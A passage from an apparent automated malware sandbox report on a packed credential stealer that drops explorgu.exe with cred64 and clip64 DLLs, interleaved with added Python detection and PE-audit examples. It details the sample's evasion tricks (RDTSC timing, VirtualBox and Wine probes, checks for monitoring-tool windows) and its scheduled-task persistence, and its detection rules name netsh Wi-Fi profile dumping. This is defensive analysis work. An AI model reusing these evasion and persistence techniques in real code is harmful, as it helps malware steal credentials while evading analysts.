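    ProcessEvent(1500, 1100, r"C:\Windows\SysWOW64\rundll32.exe", CLIP64_CMD),
    ProcessEvent(1600, 1300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", ZIP_CMD),
    ProcessEvent(2000, 1, r"C:\Windows\System32\cmd.exe", "cmd.exe"),            # benign control
    ProcessEvent(2100, 2000, r"C:\Windows\System32\netsh.exe", "netsh wlan show profiles"),
]

if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"pid {f['pid']}: {f['rule']} [{f['detail']}] via {' <- '.join(f['lineage'])}")
```

The lineage walk is what turns five isolated hits into one incident rooted at explorgu.exe; the same walk also explains the doubled rundll32 in the tree, which the report shows because the 32-bit host relaunches the 64-bit rundll32 for the x64 stealer DLL. The netsh rule deliberately excludes interactive parents so an administrator checking saved profiles from a shell does not trip it.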
Source: C:\Users\user\Desktop\wIaKimJFke.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office Jump to behavior
Source: wIaKimJFke.exe Static file information: File size 1906688 > 1048576
Source: wIaKimJFke.exe Static PE information: Raw size of qrqrzugw is bigger than: 0x100000 < 0x1a0400
Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64.dll.5.dr, cred64[1].dll.5.dr

Data Obfuscation

Source: C:\Users\user\Desktop\wIaKimJFke.exe Unpacked PE file: 0.2.wIaKimJFke.exe.4e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Unpacked PE file: 1.2.explorgu.exe.2a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Unpacked PE file: 5.2.explorgu.exe.2a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: cred64[1].dll.5.dr Static PE information: real checksum: 0x0 should be: 0x14318c
Source: clip64.dll.5.dr Static PE information: real checksum: 0x0 should be: 0x2b5a5
Source: explorgu.exe.0.dr Static PE information: real checksum: 0x1dd93d should be: 0x1d8f6e
Source: clip64[1].dll.5.dr Static PE information: real checksum: 0x0 should be: 0x2b5a5
Source: wIaKimJFke.exe Static PE information: real checksum: 0x1dd93d should be: 0x1d8f6e
Source: cred64.dll.5.dr Static PE information: real checksum: 0x0 should be: 0x14318c
Source: wIaKimJFke.exe Static PE information: section name:
Source: wIaKimJFke.exe Static PE information: section name: .idata
Source: wIaKimJFke.exe Static PE information: section name:
Source: wIaKimJFke.exe Static PE information: section name: qrqrzugw
Source: wIaKimJFke.exe Static PE information: section name: ajeqznom
Source: wIaKimJFke.exe Static PE information: section name: .taggant
Source: explorgu.exe.0.dr Static PE information: section name:
Source: explorgu.exe.0.dr Static PE information: section name: .idata
Source: explorgu.exe.0.dr Static PE information: section name:
Source: explorgu.exe.0.dr Static PE information: section name: qrqrzugw
Source: explorgu.exe.0.dr Static PE information: section name: ajeqznom
Source: explorgu.exe.0.dr Static PE information: section name: .taggant
Source: cred64[1].dll.5.dr Static PE information: section name: _RDATA
Source: cred64.dll.5.dr Static PE information: section name: _RDATA
Source: C:\Users\user\Desktop\wIaKimJFke.exe Code function: 0_2_004FD2A1 push ecx; ret 0_2_004FD29F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_6E2269E6 push ecx; ret 10_2_6E2269F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B700942 push E95B63D0h; ret 11_2_00007FFD9B7009C9
Source: wIaKimJFke.exe Static PE information: section name: entropy: 7.985573734729088
Source: wIaKimJFke.exe Static PE information: section name: qrqrzugw entropy: 7.952553763382188
Source: explorgu.exe.0.dr Static PE information: section name: entropy: 7.985573734729088
Source: explorgu.exe.0.dr Static PE information: section name: qrqrzugw entropy: 7.952553763382188
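The static findings above describe the packer in three independent ways: the header CheckSum is 0x0 (or stale) rather than the value recomputed from the file, section names are blank or random (qrqrzugw, ajeqznom, .taggant), and those sections sit near 8 bits of entropy while being mapped writable and executable. Each of those can be checked without a disassembler. The following is an added example, not code from this report or from Joe Sandbox, that parses the PE section table with the standard library only, recomputes the checksum with the algorithm CheckSumMappedFile uses, and scores each section; the minimal PE it audits is constructed in the block itself (three sections modelled on the layout reported above, CheckSum left at 0), not the analysed sample.

```python
import math
import struct
from collections import Counter

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
STANDARD_SECTION_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                          ".edata", ".pdata", ".bss", ".tls", ".CRT", ".didat"}


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one (packed/encrypted)."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum((c / n) * math.log2(c / n) for c in Counter(buf).values())


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Recompute IMAGE_OPTIONAL_HEADER.CheckSum: sum the file as 32-bit words with
    end-around carry, skipping the CheckSum field, fold to 16 bits, add the file length."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def audit_pe(data: bytes) -> dict:
    """Header checksum vs. recomputed value, plus name/entropy/rights checks per section."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt_off = e_lfanew + 24
    checksum_off = opt_off + 64                      # same offset in PE32 and PE32+
    header_checksum = struct.unpack_from("<I", data, checksum_off)[0]
    computed = pe_checksum(data, checksum_off)
    sections = []
    for i in range(nsec):
        off = opt_off + opt_size + 40 * i            # IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", data, off + 8)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        ent = shannon_entropy(data[raw_ptr:raw_ptr + raw_size])
        reasons = []
        if name not in STANDARD_SECTION_NAMES:
            reasons.append("non-standard name" if name else "blank name")
        if ent > 7.5:
            reasons.append(f"high entropy {ent:.2f}")
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            reasons.append("writable+executable")
        sections.append({"name": name, "entropy": ent, "reasons": reasons})
    return {"header_checksum": header_checksum, "computed_checksum": computed,
            "checksum_mismatch": header_checksum != computed, "sections": sections}


def build_sample_pe(sections, checksum=0) -> bytes:
    """Constructed minimal PE32 (headers plus raw section data) used to exercise audit_pe."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                                   # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)  # i386, EXECUTABLE_IMAGE|32BIT_MACHINE
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                                   # PE32 magic
    struct.pack_into("<I", opt, 64, checksum)
    headers_len = 64 + 4 + len(coff) + len(opt) + 40 * len(sections)
    table, bodies = bytearray(), bytearray()
    for name, body, chars in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(body), 0x1000,
                             len(body), headers_len + len(bodies), 0, 0, 0, 0, chars)
        bodies += body
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table) + bytes(bodies)


# Constructed sample: a plain .text, a randomly named high-entropy W+X section,
# and a blank-named W+X section, with the header CheckSum left at 0.
SAMPLE_SECTIONS = [
    (".text", b"\x90" * 1024, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    ("qrqrzugw", bytes(range(256)) * 4, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    ("", bytes(range(256)), IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE),
]
SAMPLE_PE = build_sample_pe(SAMPLE_SECTIONS)

if __name__ == "__main__":
    report = audit_pe(SAMPLE_PE)
    print(f"checksum header=0x{report['header_checksum']:x} computed=0x{report['computed_checksum']:x}")
    for s in report["sections"]:
        print(f"{s['name'] or '<blank>':10} entropy={s['entropy']:.3f} {', '.join(s['reasons']) or 'ok'}")
```

A zero or stale CheckSum on its own is weak evidence, since the linker only fills it in for drivers and some signed images, which is why the example reports it alongside the entropy and section-rights signals rather than scoring it alone. The 7.5-bit threshold is a conventional cut-off for compressed or encrypted data; legitimately compressed resources can cross it, so a hit on .rsrc deserves a look before it is called packing.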
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File created: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File created: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll Jump to dropped file
Source: C:\Users\user\Desktop\wIaKimJFke.exe File created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll Jump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\wIaKimJFke.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe File created: C:\Windows\Tasks\explorgu.job
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\wIaKimJFke.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\Desktop\wIaKimJFke.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\wIaKimJFke.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 54BAE0 second address: 54BAE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C6104 second address: 6C613E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FED7550886Ch 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jmp 00007FED75508879h 0x00000011 push esi 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop esi 0x00000017 push esi 0x00000018 jl 00007FED75508866h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C524B second address: 6C525F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C5383 second address: 6C539A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jo 00007FED75508866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jne 00007FED75508866h 0x00000013 pop edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C57D6 second address: 6C57DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C57DC second address: 6C57F2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FED75508871h 0x00000008 jmp 00007FED7550886Bh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C57F2 second address: 6C580A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FED74F3E516h 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jno 00007FED74F3E516h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C580A second address: 6C581F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED75508870h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C80BF second address: 6C8114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dx, di 0x0000000f push 00000000h 0x00000011 jmp 00007FED74F3E523h 0x00000016 push 7316E533h 0x0000001b push esi 0x0000001c pushad 0x0000001d jmp 00007FED74F3E524h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C8114 second address: 6C818A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 xor dword ptr [esp], 7316E5B3h 0x0000000d mov dx, cx 0x00000010 push 00000003h 0x00000012 call 00007FED7550886Bh 0x00000017 mov dword ptr [ebp+122D1C56h], ecx 0x0000001d pop esi 0x0000001e push 00000000h 0x00000020 xor ecx, 67827052h 0x00000026 pushad 0x00000027 cld 0x00000028 push eax 0x00000029 mov di, 5C8Fh 0x0000002d pop ecx 0x0000002e popad 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007FED75508868h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b add dword ptr [ebp+122D1D01h], edx 0x00000051 push 6552850Dh 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 pushad 0x0000005a popad 0x0000005b jmp 00007FED7550886Eh 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C8361 second address: 6C8387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop esi 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push ebx 0x0000000f pushad 0x00000010 jns 00007FED74F3E516h 0x00000016 jng 00007FED74F3E516h 0x0000001c popad 0x0000001d pop ebx 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C8387 second address: 6C838B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C838B second address: 6C8391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C8391 second address: 6C83D1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FED75508868h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jc 00007FED7550886Eh 0x00000016 jng 00007FED75508868h 0x0000001c pop eax 0x0000001d mov si, 5717h 0x00000021 lea ebx, dword ptr [ebp+1244FF8Dh] 0x00000027 and cx, 05ECh 0x0000002c push eax 0x0000002d pushad 0x0000002e jmp 00007FED7550886Dh 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C8446 second address: 6C8460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E521h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C8460 second address: 6C8464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C8464 second address: 6C84A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jnl 00007FED74F3E51Ch 0x0000000f ja 00007FED74F3E516h 0x00000015 jmp 00007FED74F3E51Dh 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f pushad 0x00000020 pushad 0x00000021 jc 00007FED74F3E516h 0x00000027 jc 00007FED74F3E516h 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 jnp 00007FED74F3E516h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C84A2 second address: 6C84B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007FED75508866h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C84B5 second address: 6C84B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C84B9 second address: 6C84BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C84BF second address: 6C84C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FED74F3E516h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C84C9 second address: 6C84CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C84CD second address: 6C8517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jng 00007FED74F3E51Ah 0x00000012 pop eax 0x00000013 jbe 00007FED74F3E51Ch 0x00000019 mov ecx, dword ptr [ebp+122D3724h] 0x0000001f push 00000003h 0x00000021 xor dword ptr [ebp+122D17D4h], eax 0x00000027 push 00000000h 0x00000029 jno 00007FED74F3E51Bh 0x0000002f push 00000003h 0x00000031 sub dword ptr [ebp+122D1DC9h], edx 0x00000037 push 9A31F0A4h 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C8517 second address: 6C851B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6C851B second address: 6C8578 instructions: 0x00000000 rdtsc 0x00000002 je 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FED74F3E51Fh 0x0000000f popad 0x00000010 add dword ptr [esp], 25CE0F5Ch 0x00000017 ja 00007FED74F3E51Ch 0x0000001d lea ebx, dword ptr [ebp+1244FF98h] 0x00000023 sub dword ptr [ebp+122D1820h], edi 0x00000029 xchg eax, ebx 0x0000002a jnc 00007FED74F3E528h 0x00000030 jmp 00007FED74F3E522h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 js 00007FED74F3E518h 0x0000003e push ecx 0x0000003f pop ecx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6DB477 second address: 6DB47B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6DB47B second address: 6DB489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FED74F3E51Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6E888A second address: 6E88DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 je 00007FED75508866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FED7550886Ah 0x00000014 popad 0x00000015 jmp 00007FED7550886Dh 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jnl 00007FED75508866h 0x00000024 jmp 00007FED75508877h 0x00000029 popad 0x0000002a jmp 00007FED7550886Ah 0x0000002f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6E8A34 second address: 6E8A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FED74F3E516h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6E8A40 second address: 6E8A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6E8A44 second address: 6E8A48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6E8A48 second address: 6E8A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6E8A55 second address: 6E8AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007FED74F3E546h 0x00000011 jmp 00007FED74F3E528h 0x00000016 jmp 00007FED74F3E528h 0x0000001b push eax 0x0000001c push edx 0x0000001d jns 00007FED74F3E516h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6E8E45 second address: 6E8E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FED75508866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6E8F83 second address: 6E8F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6E90DE second address: 6E90E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6E90E6 second address: 6E9102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FED74F3E523h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6E9102 second address: 6E9106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
